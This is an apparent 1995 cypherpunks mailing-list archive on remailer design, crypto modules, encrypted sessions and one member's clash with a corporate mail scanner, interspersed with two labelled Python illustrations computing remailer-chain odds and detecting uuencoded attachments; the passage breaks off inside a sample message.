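Added example, not part of Noyb's message: the figures above generalised to k listed remailers per hop, under the same worst-case assumption that a hop is exposed whenever any listed remailer is hostile. It also searches for the shortest chain meeting a compromise ceiling and a delivery floor, and checks the closed forms by simulation. The function names, the targets passed to plan() and the simulation seed are assumptions made for the illustration.

```python
# Added illustration of the nd-hop trade-off; all parameters are assumptions.
import math
import random


def hop_compromise(f, k):
    """Worst case: a hop is exposed if any of its k listed remailers is hostile."""
    return 1.0 - (1.0 - f) ** k


def hop_delivery(up, k):
    """A hop delivers if at least one of its k listed remailers is up."""
    return 1.0 - (1.0 - up) ** k


def path_compromise(f, k, h):
    """Probability that every one of h hops is exposed."""
    return hop_compromise(f, k) ** h


def path_delivery(up, k, h):
    """Probability that every one of h hops delivers."""
    return hop_delivery(up, k) ** h


def hop_multiplier(f, k):
    """Factor x with hop_compromise(f, k)**x == f: extra hops needed to
    match the exposure of a chain that lists one remailer per hop."""
    return math.log(f) / math.log(hop_compromise(f, k))


def plan(f, up, max_compromise, min_delivery, max_k=4, max_h=40):
    """Shortest chain (h, k) meeting both targets, or None if none exists."""
    for h in range(1, max_h + 1):
        for k in range(1, max_k + 1):
            if (path_compromise(f, k, h) <= max_compromise
                    and path_delivery(up, k, h) >= min_delivery):
                return h, k
    return None


def simulate(f, up, k, h, trials=50000, seed=1995):
    """Monte Carlo check of the closed forms under the same worst-case model."""
    rng = random.Random(seed)
    exposed = delivered = 0
    for _ in range(trials):
        all_exposed = all_delivered = True
        for _hop in range(h):
            # Each listed remailer is independently hostile (f) and up (up).
            listed = [(rng.random() < f, rng.random() < up) for _ in range(k)]
            all_exposed &= any(evil for evil, _alive in listed)
            all_delivered &= any(alive for _evil, alive in listed)
        exposed += all_exposed
        delivered += all_delivered
    return exposed / trials, delivered / trials


if __name__ == "__main__":
    print(hop_compromise(0.5, 2), hop_delivery(0.9, 2), hop_multiplier(0.5, 2))
    print(plan(0.5, 0.9, max_compromise=0.1, min_delivery=0.7))
    print(simulate(0.5, 0.9, k=2, h=3))
```

With half the remailers hostile and 90% uptime, no chain listing a single remailer per hop meets a 10% compromise ceiling and a 70% delivery floor together; the shortest chain that does lists two per hop over nine hops.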




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 31 Jan 95 19:56:07 PST
To: cypherpunks@toad.com
Subject: VoicePGP cracked in 10 minutes?...
Message-ID: <199502010348.VAA00506@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

I heard a rumor here in Ctl. Tx. that the VoicePGP project was cracked in the
last couple of days in approx. 10 minutes. Anyone have any info on this other
than one of those wild rumors that occur?

Thanks and take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Tue, 31 Jan 95 18:57:30 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <199502010253.VAA03904@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501312152.AA10208@toad.com>,  <kevin@elvis.wicat.com> wrote:
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static.

Agreed, of course.

I also don't really want to quote your entire article but want to throw
some points into the discussion.  In general, I think you've got a good
approach but might be a little too tied to instant-gratification use of
IP.

I touched on some of this a while ago, in the thread "Broadcast and the
rendezvous problem," and have thought about it a bit more after getting
others' comments:

1.  Broadcasting every couple of minutes isn't necessary and is undesirable
due to the real limitations of the Internet.  A remailer could broadcast
its location with a time-out on the location without a constant stream
of availability announcements.  In your position for example, you'd
broadcast a message at 5 pm with a 16 hour valid time.

2.  This is actually unnecessary for your situation: All you need to do is
advertise your location as a "real" remailer and then have a cron job that
kills sendmail at 5pm on your remailer machine (assuming you have a spare
machine that doesn't need to run sendmail).  The mail network is flexible
enough that things will Just Work.  Mail won't go through instantly during
the day, of course, but that just helps to muddy up the mix.

3.  Broadcasting over live IP isn't all that great a model.  Ideally,
you'll use a mechanism that doesn't require instant communication among
hosts.  I favor USENET for this: messages have a naturally long life-
time and the network is self-adjusting.  If a direct route is temporarily
unavailable, an indirect one will often manifest itself.  I also favor
using USENET store-and-forward for the messages themselves for the same
reasons: traffic analysis is impossible inside the web and direct routes
are not necessary.

4.  Using a PGP-style web-of-trust is important.  In the ideal situation,
one human in an extended web can certify individual remailers and all other
remailers close enough on the same web of trust would pick up the message
immediately.

Just some thoughts,
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy6+ThNhgovrPB7dAQHoDQP/UDn2GV7Jq8C3nQyN9IhvGMUTGnBjcL+k
zCPgTOLjANMrMN791VdeoNs9rR3QKFdFR9y0p39lka0p+9n1I3hDuEKyAX8Cicub
h0/eyr54bEzC6Q2L06VlIzDac9K7kILUkIf2ypgeXTrFuMSZITy+z0ugDeq3NA7B
W+gkl82hJZk=
=69b2
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLy73lyoZzwIn1bdtAQG/8wGA1kS3RyqBsxOZgniuxZqGySeybSJQuVp4
3zsxH545MqhBXmh16Gh4LvBlkre+9JYT
=Evbh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Tue, 31 Jan 95 19:07:06 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Frothing remailers - an immodest proposal
In-Reply-To: <ab54891b070210044757@[132.162.201.201]>
Message-ID: <199502010306.WAA20250@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 6:55 PM 01/31/95, Robert Rothenberg wrote:
> >Without quoting the entire message, I think a better solution, in terms of
> >ease to implement as well as conserving bandwidth would be to have a
> >sophisticated remailer script-language.
> 
> Yeah, this is really an excellent idea, that I don't see happening any time
> soon. Although of course if anyone wants to write code for such a beast,
> that would be really excellent.  If someone gets around to writing it,
> it'll happen, but it would be a fairly big project, so I wouldn't hold my
> breath.  Safe TCL, anyone?
> 
Hmmm... this could be combined with the "subway" remailer idea too. Have
a message format that can contain multiple destinations and a script lang
also can pick up and drop off messages, and messages can specify if they
are to be picked up or dropped off, etc.... endless possibilities...

I don't have the C/Unix skills to even attempt this though.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 31 Jan 95 22:08:49 PST
To: cypherpunks@toad.com
Subject: The security characteristics of crypto modules with secrets
In-Reply-To: <9501310546.AA09683@merckx.info.att.com>
Message-ID: <199502010607.WAA04942@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Matt Blaze <mab@research.att.com>

   I think better than expecting the world to switch over to
   cumbersome, multilevel secure OSs is to equip such servers with
   inexpensive tamper-resistant cryptographic modules that never reveal
   their secrets.

This is certainly the first step to take, even if it's not a complete
answer.

   At least then you're guaranteed that there can be only
   one instance of a machine's identity out there at a time, and have some
   hope of detecting the theft of the key material.  

Unfortunately, this isn't really true.

Let's take as our model general purpose computers which can't store
secrets connected directly to crypto modules which can.  Furthermore,
let us assume that these general purpose computers are subject to
intrusion.  In other words, it's today's servers with attached crypto.

Now, the crypto module can't authenticate the machine it's plugged
into, because, by definition, that machine can't keep a secret.  One
ends up in an infinite regress here if one tries to assume a secret in
the place we have assumed otherwise.  Because the crypto module can't
authenticate the machine, it will reply to service requests from both
the local and approved machine and any remote and unapproved machines
that can gain access to the module.  The software on the server can be
subverted in order to allow the local crypto module to service remote
requests.

The attack works like this.  First, subvert the system software on
some server, probably through existing implementation defects.  Now,
install new software on that server that allows other machines to make
remote procedure calls to the module.  Set up a client on an
impersonating machine that makes remote calls to the subverted server
whenever it needs to spoof.  The remote calls will most likely be an
encrypted protocol, to boot.  The easiest way to detect this
externally will be an additional delay in response, that is, doable
but not particularly reliable.

This is not to say that crypto modules are useless.  They have a great
use in recovery.  Because the secret doesn't leave the module, you
have an assurance after recovery (reboot from CDROM, for example) that
nobody else has the secret.  There won't be a need for an immediate
key change, at least.  What you don't get is a complete loss of
assurance of identity.

The prevalent use of modules further reduces the likelihood of initial
attacks based on spoofing.  Since active IP attacks require the
subversion of routers, and since router software is much more
difficult to subvert than general purpose servers, adding crypto
modules to routers would be a big win.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 31 Jan 95 19:25:26 PST
To: cypherpunks@toad.com
Subject: remailers and multiple recipients
Message-ID: <ab54afd9060210046105@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


Can the remailers handle multiple recipients?  If I list several addresses
in the "Request-Remailing-To:" line, separated by commas, will the remailer
do what I would think, and send off to all of them?

Anyone who knows the answer (either from experience, or because they run a
remailer, or wrote the software), please tell me. I've been trying
experimentally, unsuccessfully so far, but I'm not sure if that's just
because I'm using the wrong syntax, or the wrong remailers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 31 Jan 95 22:37:21 PST
To: mab@research.att.com (Matt Blaze)
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501312336.AA11049@merckx.info.att.com>
Message-ID: <m0rZYSI-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> >Matt, why did you choose to implement your own protocol instead of
> >adding a DH authentication/encryption type to telnet?
> >
> >               Marc
> 
> I've got one of those, too (it won't be ready for release too soon, 
> though - telnet is big and ugly).  An encrypting telnet and telnetd
> almost always provide a more appropriate way to do session encryption.
> However, there are some situations where ESM is really the only
> option.  One is when you can't or don't want to install a daemon
> (e.g., for very occasional use).  More importantly, by running within
> the session, ESM can provide end-to-end encryption across an untrusted
> application-layer firewall (like the one I go through to get
> between home and work).

I might add that esm can be installed on unix boxes in your own account
without having to be root, something which cannot be said for telnetd.
Not everyone has root access to every box they are on, so implementing
one's own interface instead of having to rely on something that requires
root access on every machine makes a lot more sense.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 31 Jan 95 20:31:13 PST
To: root <root@einstein.ssz.com>
Subject: Re: VoicePGP cracked in 10 minutes?...
In-Reply-To: <199502010348.VAA00506@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950131232744.17881C-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, root wrote:

> I heard a rumor here in Ctl. Tx. that the VoicePGP project was cracked in the
> last couple of days in approx. 10 minutes. Anyone have any info on this other
> than one of those wild rumors that occur?

	Well, uh, yeah.

	VoicePGP hasn't been completed yet, much less released. If it's 
been cracked, that's very ... surprising.

	VoicePGP uses Diffie-Hellman and 3DES with three independent 
subkeys. If anyone has come up with an attack on D-H or 3DES that works 
in ten minutes, I'd love to hear about it, as I'm sure the rest of you would.

	Call Security was cracked by Don Coppersmith [if you don't know who 
he is, shame on you: he led the IBM Lucifer/DES team] about a day after the 
announcement on sci.crypt. Call Security != VoicePGP.

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Tue, 31 Jan 95 21:32:51 PST
To: storm@marlin.ssnet.com
Subject: Re: DON'T READ!--I'm leaving for Monte Carlo just in time
In-Reply-To: <fVjBlKJXY1hE078yn@ssnet.com>
Message-ID: <9502010533.AA07005@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


> In article <199501302031.MAA16023@netcom6.netcom.com>,
> tcmay@netcom.com (Timothy C. May) wrote:
> > Actually, I'm lying. I'm leaving for Monte Carlo in a few hours, to
> > give the paper I distributed earlier. (And I'm carrying half a dozen
> > DATs, each capable of holding several gigabytes of data, or hundreds
> > of megabytes in Stego-LSB mode. And an optical disk cartridge (holding
> > only a measly 128 MB). I'll let you know if French customs raises an
> > eyebrow upon my entry to Paris--I doubt it--or if the U.S. Federales
> > take note of me upon my (attempted?) return to the land of the free.)
> 
> Let us know when/where you're returning and will call Customs with
> an 'anonymous' tip about a crypto-anarchist returning from a meeting
> with the cabal.  Monte Carlo IS the puppet state of a nominally
> Socialist government, right?  As James Coburn's character said in
> _Hudson Hawk_, "God, I miss the Commies!".
> 
Or worse, you could always tell the customs agents that he is
Zimmermann.  Then he is almost assured to get harassed.

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.  MicroSoft SNA Server SUCKS.. buy it at your own risk.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 31 Jan 95 20:35:51 PST
To: jamesd@netcom.com
Subject: Re: The RSA FAQ on http://www.catalog.com/jamesd/rsafaq.html
In-Reply-To: <199501310841.AAA25011@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.950131233256.17881D-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995 jamesd@netcom.com wrote:

> Chris converted the RSA FAQ to html for easy reading.
> I have placed this faq on http://www.catalog.com/jamesd/rsafaq.html

	Um, the RSA FAQ has been available in HTML hypertext form on 
http://www.rsa.com for at least four months now. Thanks for the effort 
and all -- I just think it's a bit duplicated.

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 31 Jan 95 23:37:36 PST
To: cypherpunks@toad.com
Subject: Re: How the cypherpunks nearly got me fired (long)
Message-ID: <v03001102ab54e8d6db82@[140.174.229.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:10 1/31/95, David Mandl wrote:

[really horrid story about true life at a corporate dinosaur deleted]

>I just thought
>you might enjoy this little story, and would want to keep it in mind if
>you're ever considering employment at Bear-Stearns.

Part of my job-interviewing procedure has become grilling a would-be
employer (or whoever is asking for a contractor) about their net
connections.  I've been very pleasantly surprised that most [techie] places
are okay on a prospective employee being interested in the tech grunge of
net access, and considering it part of the working environment, a benefit,
like gourmet coffee.

On the other hand, HP (that god-awful backwards cesspool of bureaucracy) had
full net connections to the outside world (when I was there, since turned
off) but in a pathetic attempt to show due diligence searched our
briefcases and backpacks (but not the contents of the laptops, floppies, or
tape cartridges therein).  Someone's going to have to explain to their
legal counsel that taking paper versions out isn't the most efficient
way... :-)

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Bierbaum <aronb@nishna.net>
Date: Tue, 11 Feb 1997 06:25:56 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <199702111425.GAA19704@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Bierbaum <aronb@nishna.net>
Date: Sun, 9 Feb 1997 10:15:45 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <2F39B26F.6753@nishna.net>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peng-chiew Low <pclow@pc.jaring.my>
Date: Tue, 20 Feb 96 22:25:42 PST
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: ANNOUNCE: New Crypto Product!
In-Reply-To: <Pine.3.89.9602201458.A32281-0100000@dal1820.computek.net>
Message-ID: <2F49867D.50@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp wrote:
> 
> CompuScam, Inc., an unwholly-owned invention of InventiData, is pleased to
> announce its latest offering in the growingly lucrative Internet Security
> market.  Called "Secure Users Everywhere", SUE is "guaranteed privacy
> protection for citizen-units everywhere," according to Ed Carp, Chief
> Scientist, Chief Executive Officer, and Chief Everything Else for
> CompuScam.  In today's press release, Carp said that "SUE is destined to
> become the dominant market leader in a field full of inferior products."
> 
> SUE is designed to work in any environment, and provides "Fort Knox"
> security for Internet users who wish to transact business over the "net".
> "Up until now, the Internet has been totally exposed, totally wide open to
> every 12-year-old wannabe cracker with a cheap PC and a modem," said Carp,
> "but with SUE, all that has changed overnight.  Now SUE users can safely
> and securely exchange the most sensitive of documents, including credit
> card and checking account numbers, SSN, employee information, credit
> reports, gold bars - virtually anything that is of value can now be safely
> transported across the Internet."
> 
> No details were immediately available on the technical foundations of SUE,
> but Carp indicated that this is to provide enhanced security for its
> customers, adding that "you wouldn't want everyone to see your data, would
> you?  Then why would you want everyone to know about how this software
> works?"  According to CompuScam, SUE is composed of a small software "TSR"
> that is loaded into memory when a computer is first powered up, and a
> proprietary hardware device, known as a CUD ("compulsive exteriorization
> device") that provides "total security" for the software.  Carp indicated
> that the software TSR is "completely ITAR/RNG/SHA/RC4/BBS/RSA/MD5
> compliant, and meets all government standards for the very highest levels
> of cryptographic software, including FIPS-180, SESAME, and STU-III."  The
> hardware device is reportedly PRNG/RNG compliant.
> 
> Additionally, the SUE product is reportedly backwards-compatible with most
> other manufacturers' "inferior" cryptographic products, including products
> from Digital Pathworks, AT&T, VeriSign, IBM, and others.  Asked whether or
> not SUE is compatible with electronic cash offerings from First Virtual
> and others, Carp said, "Our total solution is so comprehensive, we've
> fixed problems that even the National Security Agency hasn't thought of
> yet.  We've also totally addressed the major problems that First Virtual
> brought to light last month in their press release," adding that no other
> cryptographic software maker had even responded to First Virtual's
> announcement, "let alone done anything about it.  We are acting now to
> protect our customers and children on the Internet by providing total
> coverage of the market."
> 
> Carp denied rumors that the CompuScam was nothing but a mailbox located in
> a Mailboxes Etc., branch office in Garland.  "I believe you will find that
> a reporter obtained an early press release which contained a
> typographical error in our suite number," adding that the company is
> expecting to move soon to new offices near Sun Microsystems in Palo Alto,
> adding that "the proximity to so many Silicon Valley companies will no
> doubt enhance the value of our
> stock^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hquality of our software."
> 
> When asked about the timing of the release, noting that it was only a few
> days before the company was scheduled to go public, Carp said, "this is an
> absolutely wonderful opportunity for investors to get in on the ground
> floor of this new technology" adding something about a new Porsche which
> the reporters didn't quite catch.
> 
> SUE is available for PCs running all versions of Microsoft Windows,
> Windows 95, Windows NT and MS-DOS, as well as all UNIX and UNIX-like
> platforms, and MVS.  The CUD hardware device is available in .357, .45,
> .44 Magnum, and 9MM versions.  Pricing was not immediately available.
> --

	And of course, export license has been granted to Iraq, Iran
	and the rest of the "non-hostile challenged" (?) world.
	Wonderful!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 1 Feb 95 00:11:56 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: The security characteristics of crypto modules with secrets
In-Reply-To: <199502010607.WAA04942@largo.remailer.net>
Message-ID: <Pine.3.89.9501312316.A19818-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


From: Matt Blaze <mab@research.att.com>
On Tue, 31 Jan 1995, Eric Hughes wrote:
> Let's take as our model general purpose computers which can't store
> secrets connected directly to crypto modules which can.  Furthermore,
> let us assume that these general purpose computers are subject to
> intrusion.  In other words, it's today's servers with attached crypto.
> 
> Now, the crypto module can't authenticate the machine it's plugged
> into, because, by definition, that machine can't keep a secret.

The model does not work, because that is not what we
want to do.

True:  Matt's proposal cannot authenticate a machine.  But
one does not really want to authenticate a machine.  One
wants to authenticate data, that one might choose
to transmit from that machine.  For this purpose a 
tamper resistant crypto module that can be connected 
to a machine, but which is under user
control, not under the control of the machine, is the
only totally bullet proof solution.

Of course expensive tamper proof crypto modules already exist:  A
DOS computer in a room with a key, running virtually no
network software and possessing almost no utilities, though
doubtless what Matt had in mind was a PCI card that one
could keep in one's wallet.

> The prevalent use of modules further reduces the likelihood of initial
> attacks based on spoofing.  Since active IP attacks require the
> subversion of routers, and since router software is much more
> difficult to subvert than general purpose servers, adding crypto
> modules to routers would be a big win.

This does not make sense:  The advantage of a tamper resistant module
is that if somebody physically gets to the system, he still cannot
get the key.  But if he physically gets to the router, he can
make it do his will, even if he does not get the key.  So one
might as well have the key in software in the router.

If the router is hard to subvert, and the attacker cannot 
physically get to it, then there is little need for a separate
tamper resistant module.  Software will do fine.

If the router can be got at, you are stuffed regardless, tamper
resistant module or not.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 31 Jan 95 11:50:07 PST
To: cypherpunks@toad.com
Subject: Re: PFF's Magna Carta and the new netserfs
Message-ID: <gate.07wTZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp wrote:
> > Unrestrained economic powers (companies, corporations, whatever) have
> > the same property.  This seemed to me to be a fundamental point that
> > Rishab was making -- and one that is often ignored in discussions of
> > economic libertarianism.
> 
> Agreed, but I don't see that that was the point Rishab was making.  Oh, well..

It was, actually. "Corporations can be at least as bad as governments" - the
examples of extreme circumstances were extraneous.

BTW the original analysis of the PFF thing by Richard Moore was posted here
on the 25th by him, though he seems to think that I got it from elsewhere and
volunteered to post it...

-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Tue, 31 Jan 95 22:10:16 PST
To: cypherpunks@toad.com
Subject: How the cypherpunks nearly got me fired (long)
Message-ID: <v01510101ab54c32859a7@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


This is a true story.

Yesterday, I found out that the mail at the company I work for is being
read by SAs on a regular basis.  The company is so ignorant about the net,
so stingy, and so paranoid, that they're terrified by the possibilities of
our internet access (which is crippled: email only, with a misconfigured
sendmail, no less; no ftp or telnet; no Usenet).  People receiving email
from outside could be receiving JPEGs or sound files--all
non-business-related, and therefore wasteful of company resources and
valuable employee time.  This in a biggish and very profitable Wall Street
firm.  These people are serious dinosaurs.

So they installed a pathetic scanning program.  Since the evil filetypes
are "usually uuencoded," their scanner greps all incoming mail for
"^begin"--no kidding--and stops the message right there if it's found.  I
found this out yesterday when my boss got a call from an SA: turns out he'd
been mailed a PostScript file from a vendor (some documentation we were
waiting for), and a "begin" statement in the file triggered the alarm.
After my boss assured him that it was just a user's manual, the SA let it
through.

Today, I was sitting in my boss's office in a routine meeting when _his_
boss (let's call him Larry) came by.  He said that _his_ boss (this is now
my boss's boss's boss--let's call her Mary) wanted to talk to me.  I had no
clue what she wanted, and neither did my direct boss, which seemed
particularly strange.  One thought that crossed my mind was that they were
going to give me a promotion, which I deserve and which it had been
obliquely suggested I might be getting soon.  Ha.

I walked with Larry over to our other building, four blocks away.  We went
up to Mary's office, and there she was, sitting with another woman I'd
never met.  The latter was introduced to me as--oh, let's call her "Paula."
There was a printout on the table.  Glancing at it out of the corner of my
eye, I noticed that it was a piece of email and got a chill.  Had they
intercepted email from me to a friend telling him how much the company I
work for sucks (which, ironically, I'd done just yesterday when I found out
about the mail-scanning)?  Would these three execs actually call me on this
and ask me to explain it?  I was very nervous, even though they had a piece
of MY PRIVATE CORRESPONDENCE in their hands.

Paula started off by explaining to me that they'd just installed this nifty
scanning program to catch illicit or potentially dangerous software coming
in from the outside.  Here was a piece of email, sent to me, containing a
uuencoded binary file inside of it (actually, it was just C source code, as
the header plainly stated).  From the comments at the front of the message,
it was clear that this was a piece of software intended to circumvent
firewalls, breach network security, and intentionally mask the identity of
the culprit.  (I'm more or less quoting from memory here; I only got to
glance at the comments, so I don't know exactly what the code does; it was
posted by Matt Ghio a day or two ago).  Why was I having a program like
this mailed to me?

I explained that it was sent to a mailing list that I subscribe to.  The
mailing list is concerned with encryption and data security.  This is just
something that someone on the list happened to post.  I have no control
over what people post to the list.  I read and save what's of interest to
me on the list and trash the rest, like everyone else does.

Why did I have this message forwarded from my private account to my work
account? she wanted to know.  Because I have all my mail from that
particular ("techie") list forwarded to my work account, the same way that
I keep all my other technical documentation at work--my Perl manual, my
Unix manuals, etc.  She actually pointed out that she saw the word
"cyberpunk" on the message (that's right, she can't even read), and this
also caused her concern.  (I would have been interested in hearing her
explanation for that.)

She started huffing and puffing about how this all made her very very
worried.  If there's no way to control this kind of thing, she'll just have
to turn everyone's internet access off (or just mine).  I said, "Look, I'll
turn off the forwarding when I get home tonight and not have any of this
stuff forwarded to me here any more."  She said, "Yes, naturally."

The discussion ended with her asking ME what they can do to assuage their
fears and prevent evil programs like this from being sent to employees of
the company.  I said that there wasn't much they could do; this stuff is
freely available, and if it isn't emailed in, people can still bring it in
on floppy discs.  It also could be mailed un-uuencoded (why was it
uuencoded anyway?)--and then what would they do, scan everyone's mail for
'{'?  What I didn't feel like saying at that particular place and time was
that people could just as easily bring sledgehammers in, or trash databases
using their legitimate access.  Unfortunately, the company has just got to
trust its employees.  I didn't actually say any of that because I just
wanted to get out of there.  I was getting bad flashbacks of being sent to
the principal's office in third grade.

My internet access at work is probably history; maybe everyone else's, too.
(Our access is so crippled that there are probably only four people who
even get mail from the outside; and as I said, there's no news or
ftp/telnet access.  I use it for nothing more than reading cypherpunks,
actually.  The system is so badly maintained that I'd never trust it for
personal email.)  I now have to start receiving and reading cypherpunk mail
at home, which presents a problem because my personal time is very limited,
whereas at work mail trickles in during the course of the day and is easily
managed.  This may mean I have to unsubscribe soon, after two and a half
years (almost since day one of the list).  I love Big Brother.

P.S.: I've tried to avoid injecting my personal politics into this story.
Yes, I know that as the owner of the connection, they've got the right to
do whatever they want (and this seems to be borne out by the ECPA
documents, which at a friend's suggestion I read as soon as I got home--too
bad, because I'd have seriously considered legal action).  I just thought
you might enjoy this little story, and would want to keep it in mind if
you're ever considering employment at Bear-Stearns.

   --Dave.

--
Dave Mandl
dmandl@panix.com
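
Added example, not part of the original post: the "^begin" rule described above, next to a stricter check that only reports a uuencoded attachment when the `begin <mode> <name>` header, the length-prefixed data lines and the closing `end` are all present. The three sample messages, the file name `sample.c` and all function names are constructed for illustration.

```python
import binascii
import re

# The rule from the post: any line that starts with "begin" stops the message.
NAIVE_RULE = re.compile(r"^begin", re.MULTILINE)

# A real uuencode header is "begin <octal mode> <file name>".
UU_HEADER = re.compile(r"^begin ([0-7]{3,4}) (\S.*)$")


def naive_flag(message: str) -> bool:
    """Reproduce the scanner described in the post."""
    return NAIVE_RULE.search(message) is not None


def is_uu_data_line(line: str) -> bool:
    """Check one uuencoded line: the first character encodes the byte count
    (0..45) and must be followed by exactly ceil(n/3)*4 characters, all in
    the uuencode alphabet (0x20..0x60)."""
    if not line or not all(32 <= ord(c) <= 96 for c in line):
        return False
    nbytes = (ord(line[0]) - 32) & 0x3F
    if nbytes > 45:
        return False
    return len(line) - 1 == ((nbytes + 2) // 3) * 4


def find_uuencoded_files(message: str) -> list[str]:
    """Return the file names of well-formed uuencoded blocks in a message."""
    lines = message.splitlines()
    found = []
    i = 0
    while i < len(lines):
        header = UU_HEADER.match(lines[i])
        i += 1
        if not header:
            continue
        j = i
        while j < len(lines) and is_uu_data_line(lines[j]):
            j += 1
        # Require at least one data line and the "end" trailer.
        if j > i and j < len(lines) and lines[j] == "end":
            found.append(header.group(2))
            i = j + 1
    return found


def make_uuencoded(name: str, payload: bytes) -> str:
    """Build a uuencoded block for the constructed sample below."""
    body = [binascii.b2a_uu(payload[k:k + 45]).decode("ascii").rstrip("\n")
            for k in range(0, len(payload), 45)]
    return "\n".join([f"begin 644 {name}", *body, "`", "end"])


# --- constructed sample messages ---------------------------------------
SOURCE = b"int main(void) { return 0; }\n" * 3

POSTSCRIPT_MAIL = """\
Subject: user manual (PostScript)

%!PS-Adobe-3.0
/ManualDict 20 dict def
ManualDict
begin
/Helvetica findfont 12 scalefont setfont
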